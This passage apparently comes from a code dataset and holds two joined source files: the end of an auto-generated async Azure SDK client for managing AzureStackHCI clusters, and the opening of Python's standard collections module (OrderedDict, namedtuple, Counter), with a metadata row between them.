request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_subscription.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.AzureStackHCI/clusters'} # type: ignore
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs
) -> AsyncIterable["_models.ClusterList"]:
"""List all HCI clusters in a resource group.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ClusterList or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.azurestackhci.models.ClusterList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ClusterList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('ClusterList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AzureStackHCI/clusters'} # type: ignore
async def get(
self,
resource_group_name: str,
cluster_name: str,
**kwargs
) -> "_models.Cluster":
"""Get HCI cluster.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param cluster_name: The name of the cluster.
:type cluster_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Cluster, or the result of cls(response)
:rtype: ~azure.mgmt.azurestackhci.models.Cluster
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Cluster"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-10-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'clusterName': self._serialize.url("cluster_name", cluster_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Cluster', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AzureStackHCI/clusters/{clusterName}'} # type: ignore
async def create(
self,
resource_group_name: str,
cluster_name: str,
cluster: "_models.Cluster",
**kwargs
) -> "_models.Cluster":
"""Create an HCI cluster.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param cluster_name: The name of the cluster.
:type cluster_name: str
:param cluster: Details of the HCI cluster.
:type cluster: ~azure.mgmt.azurestackhci.models.Cluster
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Cluster, or the result of cls(response)
:rtype: ~azure.mgmt.azurestackhci.models.Cluster
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Cluster"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'clusterName': self._serialize.url("cluster_name", cluster_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(cluster, 'Cluster')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Cluster', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AzureStackHCI/clusters/{clusterName}'} # type: ignore
async def update(
self,
resource_group_name: str,
cluster_name: str,
cluster: "_models.ClusterUpdate",
**kwargs
) -> "_models.Cluster":
"""Update an HCI cluster.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param cluster_name: The name of the cluster.
:type cluster_name: str
:param cluster: Details of the HCI cluster.
:type cluster: ~azure.mgmt.azurestackhci.models.ClusterUpdate
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Cluster, or the result of cls(response)
:rtype: ~azure.mgmt.azurestackhci.models.Cluster
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Cluster"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'clusterName': self._serialize.url("cluster_name", cluster_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(cluster, 'ClusterUpdate')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('Cluster', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AzureStackHCI/clusters/{clusterName}'} # type: ignore
async def delete(
self,
resource_group_name: str,
cluster_name: str,
**kwargs
) -> None:
"""Delete an HCI cluster.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param cluster_name: The name of the cluster.
:type cluster_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-10-01"
accept = "application/json"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'clusterName': self._serialize.url("cluster_name", cluster_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.AzureStackHCI/clusters/{clusterName}'} # type: ignore
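# A hedged usage sketch (illustrative only; ``client`` stands for a generated
# AzureStackHCI management client that exposes this class as ``client.clusters``):
#
#     >>> async for cluster in client.clusters.list_by_subscription():
#     ...     print(cluster.name)
#     >>> cluster = await client.clusters.get('my-resource-group', 'my-cluster')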
| 48.434884
| 174
| 0.658472
|
26aeac180c7151369e377ea6729966db3b32e9b8
| 45,812
|
py
|
Python
|
contrib/tools/python3/src/Lib/collections/__init__.py
|
HeyLey/catboost
|
f472aed90604ebe727537d9d4a37147985e10ec2
|
[
"Apache-2.0"
] | 36
|
2019-06-07T20:44:06.000Z
|
2022-03-23T06:19:43.000Z
|
contrib/tools/python3/src/Lib/collections/__init__.py
|
HeyLey/catboost
|
f472aed90604ebe727537d9d4a37147985e10ec2
|
[
"Apache-2.0"
] | 32
|
2018-05-01T05:24:43.000Z
|
2022-03-11T23:20:39.000Z
|
contrib/tools/python3/src/Lib/collections/__init__.py
|
HeyLey/catboost
|
f472aed90604ebe727537d9d4a37147985e10ec2
|
[
"Apache-2.0"
] | 31
|
2019-01-15T20:16:50.000Z
|
2022-03-01T05:47:38.000Z
|
'''This module implements specialized container datatypes providing
alternatives to Python's general purpose built-in containers, dict,
list, set, and tuple.
* namedtuple factory function for creating tuple subclasses with named fields
* deque list-like container with fast appends and pops on either end
* ChainMap dict-like class for creating a single view of multiple mappings
* Counter dict subclass for counting hashable objects
* OrderedDict dict subclass that remembers the order entries were added
* defaultdict dict subclass that calls a factory function to supply missing values
* UserDict wrapper around dictionary objects for easier dict subclassing
* UserList wrapper around list objects for easier list subclassing
* UserString wrapper around string objects for easier string subclassing
'''
__all__ = ['deque', 'defaultdict', 'namedtuple', 'UserDict', 'UserList',
'UserString', 'Counter', 'OrderedDict', 'ChainMap']
# For backwards compatibility, continue to make the collections ABCs
# available through the collections module.
from _collections_abc import *
import _collections_abc
__all__ += _collections_abc.__all__
from operator import itemgetter as _itemgetter, eq as _eq
from keyword import iskeyword as _iskeyword
import sys as _sys
import heapq as _heapq
from _weakref import proxy as _proxy
from itertools import repeat as _repeat, chain as _chain, starmap as _starmap
from reprlib import recursive_repr as _recursive_repr
try:
from _collections import deque
except ImportError:
pass
else:
MutableSequence.register(deque)
try:
from _collections import defaultdict
except ImportError:
pass
################################################################################
### OrderedDict
################################################################################
class _OrderedDictKeysView(KeysView):
def __reversed__(self):
yield from reversed(self._mapping)
class _OrderedDictItemsView(ItemsView):
def __reversed__(self):
for key in reversed(self._mapping):
yield (key, self._mapping[key])
class _OrderedDictValuesView(ValuesView):
def __reversed__(self):
for key in reversed(self._mapping):
yield self._mapping[key]
class _Link(object):
__slots__ = 'prev', 'next', 'key', '__weakref__'
class OrderedDict(dict):
'Dictionary that remembers insertion order'
# An inherited dict maps keys to values.
# The inherited dict provides __getitem__, __len__, __contains__, and get.
# The remaining methods are order-aware.
# Big-O running times for all methods are the same as regular dictionaries.
# The internal self.__map dict maps keys to links in a doubly linked list.
# The circular doubly linked list starts and ends with a sentinel element.
# The sentinel element never gets deleted (this simplifies the algorithm).
# The sentinel is in self.__hardroot with a weakref proxy in self.__root.
# The prev links are weakref proxies (to prevent circular references).
# Individual links are kept alive by the hard reference in self.__map.
# Those hard references disappear when a key is deleted from an OrderedDict.
def __init__(*args, **kwds):
'''Initialize an ordered dictionary. The signature is the same as
regular dictionaries. Keyword argument order is preserved.
'''
if not args:
raise TypeError("descriptor '__init__' of 'OrderedDict' object "
"needs an argument")
self, *args = args
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__root
except AttributeError:
self.__hardroot = _Link()
self.__root = root = _proxy(self.__hardroot)
root.prev = root.next = root
self.__map = {}
self.__update(*args, **kwds)
def __setitem__(self, key, value,
dict_setitem=dict.__setitem__, proxy=_proxy, Link=_Link):
'od.__setitem__(i, y) <==> od[i]=y'
# Setting a new item creates a new link at the end of the linked list,
# and the inherited dictionary is updated with the new key/value pair.
if key not in self:
self.__map[key] = link = Link()
root = self.__root
last = root.prev
link.prev, link.next, link.key = last, root, key
last.next = link
root.prev = proxy(link)
dict_setitem(self, key, value)
def __delitem__(self, key, dict_delitem=dict.__delitem__):
'od.__delitem__(y) <==> del od[y]'
# Deleting an existing item uses self.__map to find the link which gets
# removed by updating the links in the predecessor and successor nodes.
dict_delitem(self, key)
link = self.__map.pop(key)
link_prev = link.prev
link_next = link.next
link_prev.next = link_next
link_next.prev = link_prev
link.prev = None
link.next = None
def __iter__(self):
'od.__iter__() <==> iter(od)'
# Traverse the linked list in order.
root = self.__root
curr = root.next
while curr is not root:
yield curr.key
curr = curr.next
def __reversed__(self):
'od.__reversed__() <==> reversed(od)'
# Traverse the linked list in reverse order.
root = self.__root
curr = root.prev
while curr is not root:
yield curr.key
curr = curr.prev
def clear(self):
'od.clear() -> None. Remove all items from od.'
root = self.__root
root.prev = root.next = root
self.__map.clear()
dict.clear(self)
def popitem(self, last=True):
'''Remove and return a (key, value) pair from the dictionary.
Pairs are returned in LIFO order if last is true or FIFO order if false.
'''
if not self:
raise KeyError('dictionary is empty')
root = self.__root
if last:
link = root.prev
link_prev = link.prev
link_prev.next = root
root.prev = link_prev
else:
link = root.next
link_next = link.next
root.next = link_next
link_next.prev = root
key = link.key
del self.__map[key]
value = dict.pop(self, key)
return key, value
def move_to_end(self, key, last=True):
'''Move an existing element to the end (or beginning if last==False).
Raises KeyError if the element does not exist.
When last=True, acts like a fast version of self[key]=self.pop(key).
'''
link = self.__map[key]
link_prev = link.prev
link_next = link.next
soft_link = link_next.prev
link_prev.next = link_next
link_next.prev = link_prev
root = self.__root
if last:
last = root.prev
link.prev = last
link.next = root
root.prev = soft_link
last.next = link
else:
first = root.next
link.prev = root
link.next = first
first.prev = soft_link
root.next = link
def __sizeof__(self):
sizeof = _sys.getsizeof
n = len(self) + 1 # number of links including root
size = sizeof(self.__dict__) # instance dictionary
size += sizeof(self.__map) * 2 # internal dict and inherited dict
size += sizeof(self.__hardroot) * n # link objects
size += sizeof(self.__root) * n # proxy objects
return size
update = __update = MutableMapping.update
def keys(self):
"D.keys() -> a set-like object providing a view on D's keys"
return _OrderedDictKeysView(self)
def items(self):
"D.items() -> a set-like object providing a view on D's items"
return _OrderedDictItemsView(self)
def values(self):
"D.values() -> an object providing a view on D's values"
return _OrderedDictValuesView(self)
__ne__ = MutableMapping.__ne__
__marker = object()
def pop(self, key, default=__marker):
'''od.pop(k[,d]) -> v, remove specified key and return the corresponding
value. If key is not found, d is returned if given, otherwise KeyError
is raised.
'''
if key in self:
result = self[key]
del self[key]
return result
if default is self.__marker:
raise KeyError(key)
return default
def setdefault(self, key, default=None):
'od.setdefault(k[,d]) -> od.get(k,d), also set od[k]=d if k not in od'
if key in self:
return self[key]
self[key] = default
return default
@_recursive_repr()
def __repr__(self):
'od.__repr__() <==> repr(od)'
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, list(self.items()))
def __reduce__(self):
'Return state information for pickling'
inst_dict = vars(self).copy()
for k in vars(OrderedDict()):
inst_dict.pop(k, None)
return self.__class__, (), inst_dict or None, None, iter(self.items())
def copy(self):
'od.copy() -> a shallow copy of od'
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
'''OD.fromkeys(S[, v]) -> New ordered dictionary with keys from S.
If not specified, the value defaults to None.
'''
self = cls()
for key in iterable:
self[key] = value
return self
def __eq__(self, other):
'''od.__eq__(y) <==> od==y. Comparison to another OD is order-sensitive
while comparison to a regular mapping is order-insensitive.
'''
if isinstance(other, OrderedDict):
return dict.__eq__(self, other) and all(map(_eq, self, other))
return dict.__eq__(self, other)
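# A short usage sketch of the order-aware methods defined above (illustrative):
#
#     >>> od = OrderedDict.fromkeys('abc')
#     >>> od.move_to_end('a')
#     >>> list(od)
#     ['b', 'c', 'a']
#     >>> od.popitem(last=False)
#     ('b', None)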
try:
from _collections import OrderedDict
except ImportError:
# Leave the pure Python version in place.
pass
################################################################################
### namedtuple
################################################################################
_class_template = """\
from builtins import property as _property, tuple as _tuple
from operator import itemgetter as _itemgetter
from collections import OrderedDict
class {typename}(tuple):
'{typename}({arg_list})'
__slots__ = ()
_fields = {field_names!r}
def __new__(_cls, {arg_list}):
'Create new instance of {typename}({arg_list})'
return _tuple.__new__(_cls, ({arg_list}))
@classmethod
def _make(cls, iterable, new=tuple.__new__, len=len):
'Make a new {typename} object from a sequence or iterable'
result = new(cls, iterable)
if len(result) != {num_fields:d}:
raise TypeError('Expected {num_fields:d} arguments, got %d' % len(result))
return result
def _replace(_self, **kwds):
'Return a new {typename} object replacing specified fields with new values'
result = _self._make(map(kwds.pop, {field_names!r}, _self))
if kwds:
raise ValueError('Got unexpected field names: %r' % list(kwds))
return result
def __repr__(self):
'Return a nicely formatted representation string'
return self.__class__.__name__ + '({repr_fmt})' % self
def _asdict(self):
'Return a new OrderedDict which maps field names to their values.'
return OrderedDict(zip(self._fields, self))
def __getnewargs__(self):
'Return self as a plain tuple. Used by copy and pickle.'
return tuple(self)
{field_defs}
"""
_repr_template = '{name}=%r'
_field_template = '''\
{name} = _property(_itemgetter({index:d}), doc='Alias for field number {index:d}')
'''
def namedtuple(typename, field_names, *, verbose=False, rename=False, module=None):
"""Returns a new subclass of tuple with named fields.
>>> Point = namedtuple('Point', ['x', 'y'])
>>> Point.__doc__ # docstring for the new class
'Point(x, y)'
>>> p = Point(11, y=22) # instantiate with positional args or keywords
>>> p[0] + p[1] # indexable like a plain tuple
33
>>> x, y = p # unpack like a regular tuple
>>> x, y
(11, 22)
>>> p.x + p.y # fields also accessible by name
33
>>> d = p._asdict() # convert to a dictionary
>>> d['x']
11
>>> Point(**d) # convert from a dictionary
Point(x=11, y=22)
>>> p._replace(x=100) # _replace() is like str.replace() but targets named fields
Point(x=100, y=22)
"""
# Validate the field names. At the user's option, either generate an error
# message or automatically replace the field name with a valid name.
if isinstance(field_names, str):
field_names = field_names.replace(',', ' ').split()
field_names = list(map(str, field_names))
typename = str(typename)
if rename:
seen = set()
for index, name in enumerate(field_names):
if (not name.isidentifier()
or _iskeyword(name)
or name.startswith('_')
or name in seen):
field_names[index] = '_%d' % index
seen.add(name)
for name in [typename] + field_names:
if type(name) is not str:
raise TypeError('Type names and field names must be strings')
if not name.isidentifier():
raise ValueError('Type names and field names must be valid '
'identifiers: %r' % name)
if _iskeyword(name):
raise ValueError('Type names and field names cannot be a '
'keyword: %r' % name)
seen = set()
for name in field_names:
if name.startswith('_') and not rename:
raise ValueError('Field names cannot start with an underscore: '
'%r' % name)
if name in seen:
raise ValueError('Encountered duplicate field name: %r' % name)
seen.add(name)
# Fill-in the class template
class_definition = _class_template.format(
typename = typename,
field_names = tuple(field_names),
num_fields = len(field_names),
arg_list = repr(tuple(field_names)).replace("'", "")[1:-1],
repr_fmt = ', '.join(_repr_template.format(name=name)
for name in field_names),
field_defs = '\n'.join(_field_template.format(index=index, name=name)
for index, name in enumerate(field_names))
)
# Execute the template string in a temporary namespace and support
# tracing utilities by setting a value for frame.f_globals['__name__']
namespace = dict(__name__='namedtuple_%s' % typename)
exec(class_definition, namespace)
result = namespace[typename]
result._source = class_definition
if verbose:
print(result._source)
# For pickling to work, the __module__ variable needs to be set to the frame
# where the named tuple is created. Bypass this step in environments where
# sys._getframe is not defined (Jython for example) or sys._getframe is not
# defined for arguments greater than 0 (IronPython), or where the user has
# specified a particular module.
if module is None:
try:
module = _sys._getframe(1).f_globals.get('__name__', '__main__')
except (AttributeError, ValueError):
pass
if module is not None:
result.__module__ = module
return result
########################################################################
### Counter
########################################################################
def _count_elements(mapping, iterable):
'Tally elements from the iterable.'
mapping_get = mapping.get
for elem in iterable:
mapping[elem] = mapping_get(elem, 0) + 1
try: # Load C helper function if available
from _collections import _count_elements
except ImportError:
pass
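# A tiny sketch of the helper above (illustrative):
#
#     >>> d = {}
#     >>> _count_elements(d, 'abca')
#     >>> d
#     {'a': 2, 'b': 1, 'c': 1}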
class Counter(dict):
'''Dict subclass for counting hashable items. Sometimes called a bag
or multiset. Elements are stored as dictionary keys and their counts
are stored as dictionary values.
>>> c = Counter('abcdeabcdabcaba') # count elements from a string
>>> c.most_common(3) # three most common elements
[('a', 5), ('b', 4), ('c', 3)]
>>> sorted(c) # list all unique elements
['a', 'b', 'c', 'd', 'e']
>>> ''.join(sorted(c.elements())) # list elements with repetitions
'aaaaabbbbcccdde'
>>> sum(c.values()) # total of all counts
15
>>> c['a'] # count of letter 'a'
5
>>> for elem in 'shazam': # update counts from an iterable
... c[elem] += 1 # by adding 1 to each element's count
>>> c['a'] # now there are seven 'a'
7
>>> del c['b'] # remove all 'b'
>>> c['b'] # now there are zero 'b'
0
>>> d = Counter('simsalabim') # make another counter
>>> c.update(d) # add in the second counter
>>> c['a'] # now there are nine 'a'
9
>>> c.clear() # empty the counter
>>> c
Counter()
Note: If a count is set to zero or reduced to zero, it will remain
in the counter until the entry is deleted or the counter is cleared:
>>> c = Counter('aaabbc')
>>> c['b'] -= 2 # reduce the count of 'b' by two
>>> c.most_common() # 'b' is still in, but its count is zero
[('a', 3), ('c', 1), ('b', 0)]
'''
# References:
# http://en.wikipedia.org/wiki/Multiset
# http://www.gnu.org/software/smalltalk/manual-base/html_node/Bag.html
# http://www.demo2s.com/Tutorial/Cpp/0380__set-multiset/Catalog0380__set-multiset.htm
# http://code.activestate.com/recipes/259174/
# Knuth, TAOCP Vol. II section 4.6.3
def __init__(*args, **kwds):
'''Create a new, empty Counter object. And if given, count elements
from an input iterable. Or, initialize the count from another mapping
of elements to their counts.
>>> c = Counter() # a new, empty counter
>>> c = Counter('gallahad') # a new counter from an iterable
>>> c = Counter({'a': 4, 'b': 2}) # a new counter from a mapping
>>> c = Counter(a=4, b=2) # a new counter from keyword args
'''
if not args:
raise TypeError("descriptor '__init__' of 'Counter' object "
"needs an argument")
self, *args = args
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
super(Counter, self).__init__()
self.update(*args, **kwds)
def __missing__(self, key):
'The count of elements not in the Counter is zero.'
# Needed so that self[missing_item] does not raise KeyError
return 0
def most_common(self, n=None):
'''List the n most common elements and their counts from the most
common to the least. If n is None, then list all element counts.
>>> Counter('abcdeabcdabcaba').most_common(3)
[('a', 5), ('b', 4), ('c', 3)]
'''
# Emulate Bag.sortedByCount from Smalltalk
if n is None:
return sorted(self.items(), key=_itemgetter(1), reverse=True)
return _heapq.nlargest(n, self.items(), key=_itemgetter(1))
def elements(self):
'''Iterator over elements repeating each as many times as its count.
>>> c = Counter('ABCABC')
>>> sorted(c.elements())
['A', 'A', 'B', 'B', 'C', 'C']
# Knuth's example for prime factors of 1836: 2**2 * 3**3 * 17**1
>>> prime_factors = Counter({2: 2, 3: 3, 17: 1})
>>> product = 1
>>> for factor in prime_factors.elements(): # loop over factors
... product *= factor # and multiply them
>>> product
1836
Note, if an element's count has been set to zero or is a negative
number, elements() will ignore it.
'''
# Emulate Bag.do from Smalltalk and Multiset.begin from C++.
return _chain.from_iterable(_starmap(_repeat, self.items()))
# Override dict methods where necessary
@classmethod
def fromkeys(cls, iterable, v=None):
# There is no equivalent method for counters because setting v=1
# means that no element can have a count greater than one.
raise NotImplementedError(
'Counter.fromkeys() is undefined. Use Counter(iterable) instead.')
def update(*args, **kwds):
'''Like dict.update() but add counts instead of replacing them.
Source can be an iterable, a dictionary, or another Counter instance.
>>> c = Counter('which')
>>> c.update('witch') # add elements from another iterable
>>> d = Counter('watch')
>>> c.update(d) # add elements from another counter
>>> c['h'] # four 'h' in which, witch, and watch
4
'''
# The regular dict.update() operation makes no sense here because the
        # replace behavior results in some of the original untouched counts
        # being mixed-in with all of the other counts for a mishmash that
        # doesn't have a straightforward interpretation in most counting
# contexts. Instead, we implement straight-addition. Both the inputs
# and outputs are allowed to contain zero and negative counts.
if not args:
raise TypeError("descriptor 'update' of 'Counter' object "
"needs an argument")
self, *args = args
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
iterable = args[0] if args else None
if iterable is not None:
if isinstance(iterable, Mapping):
if self:
self_get = self.get
for elem, count in iterable.items():
self[elem] = count + self_get(elem, 0)
else:
super(Counter, self).update(iterable) # fast path when counter is empty
else:
_count_elements(self, iterable)
if kwds:
self.update(kwds)
def subtract(*args, **kwds):
'''Like dict.update() but subtracts counts instead of replacing them.
Counts can be reduced below zero. Both the inputs and outputs are
allowed to contain zero and negative counts.
Source can be an iterable, a dictionary, or another Counter instance.
>>> c = Counter('which')
>>> c.subtract('witch') # subtract elements from another iterable
>>> c.subtract(Counter('watch')) # subtract elements from another counter
>>> c['h'] # 2 in which, minus 1 in witch, minus 1 in watch
0
>>> c['w'] # 1 in which, minus 1 in witch, minus 1 in watch
-1
'''
if not args:
raise TypeError("descriptor 'subtract' of 'Counter' object "
"needs an argument")
self, *args = args
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
iterable = args[0] if args else None
if iterable is not None:
self_get = self.get
if isinstance(iterable, Mapping):
for elem, count in iterable.items():
self[elem] = self_get(elem, 0) - count
else:
for elem in iterable:
self[elem] = self_get(elem, 0) - 1
if kwds:
self.subtract(kwds)
def copy(self):
'Return a shallow copy.'
return self.__class__(self)
def __reduce__(self):
return self.__class__, (dict(self),)
def __delitem__(self, elem):
'Like dict.__delitem__() but does not raise KeyError for missing values.'
if elem in self:
super().__delitem__(elem)
def __repr__(self):
if not self:
return '%s()' % self.__class__.__name__
try:
items = ', '.join(map('%r: %r'.__mod__, self.most_common()))
return '%s({%s})' % (self.__class__.__name__, items)
except TypeError:
# handle case where values are not orderable
return '{0}({1!r})'.format(self.__class__.__name__, dict(self))
# Multiset-style mathematical operations discussed in:
# Knuth TAOCP Volume II section 4.6.3 exercise 19
# and at http://en.wikipedia.org/wiki/Multiset
#
# Outputs guaranteed to only include positive counts.
#
# To strip negative and zero counts, add-in an empty counter:
# c += Counter()
def __add__(self, other):
'''Add counts from two counters.
>>> Counter('abbb') + Counter('bcc')
Counter({'b': 4, 'c': 2, 'a': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
newcount = count + other[elem]
if newcount > 0:
result[elem] = newcount
for elem, count in other.items():
if elem not in self and count > 0:
result[elem] = count
return result
def __sub__(self, other):
''' Subtract count, but keep only results with positive counts.
>>> Counter('abbbc') - Counter('bccd')
Counter({'b': 2, 'a': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
newcount = count - other[elem]
if newcount > 0:
result[elem] = newcount
